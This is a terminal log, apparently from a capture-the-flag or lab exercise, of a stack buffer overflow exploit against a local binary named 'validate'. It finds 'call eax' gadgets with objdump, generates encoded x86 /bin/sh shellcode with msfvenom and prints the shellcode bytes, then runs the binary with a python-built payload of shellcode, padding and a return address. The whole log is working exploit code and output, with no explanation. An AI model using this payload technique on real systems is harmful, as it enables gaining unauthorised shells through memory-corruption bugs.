[root@kali:/tmp ]# objdump -D validate|grep call|grep -i eax                                                                  -1-
8048468:       ff 14 85 14 9f 04 08    call   DWORD PTR [eax*4+0x8049f14]
80484af:       ff d0                   call   eax
804862b:       ff d0                   call   eax

[root@kali:/tmp ]# msfvenom -p linux/x86/exec CMD=/bin/sh -a x86 --platform linux -b '\x00\x0a\xff' -f c
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 70 (iteration=0)
x86/shikata_ga_nai chosen with final size 70
Payload size: 70 bytes
Final size of c file: 319 bytes
unsigned char buf[] =
"\xd9\xea\xd9\x74\x24\xf4\x58\xbb\x13\xa7\x66\x34\x33\xc9\xb1"
"\x0b\x31\x58\x1a\x83\xc0\x04\x03\x58\x16\xe2\xe6\xcd\x6d\x6c"
"\x91\x40\x14\xe4\x8c\x07\x51\x13\xa6\xe8\x12\xb4\x36\x9f\xfb"
"\x26\x5f\x31\x8d\x44\xcd\x25\x85\x8a\xf1\xb5\xb9\xe8\x98\xdb"
"\xea\x9f\x32\x24\xa2\x0c\x4b\xc5\x81\x33";

./validate $(python -c 'print "\xd9\xea\xd9\x74\x24\xf4\x58\xbb\x13\xa7\x66\x34\x33\xc9\xb1\x0b\x31\x58\x1a\x83\xc0\x04\x03\x58\x16\xe2\xe6\xcd\x6d\x6c\x91\x40\x14\xe4\x8c\x07\x51\x13\xa6\xe8\x12\xb4\x36\x9f\xfb\x26\x5f\x31\x8d\x44\xcd\x25\x85\x8a\xf1\xb5\xb9\xe8\x98\xdb\xea\x9f\x32\x24\xa2\x0c\x4b\xc5\x81\x33"+ "\x41"*(116-70) +"\xaf\x84\x04\x08"')
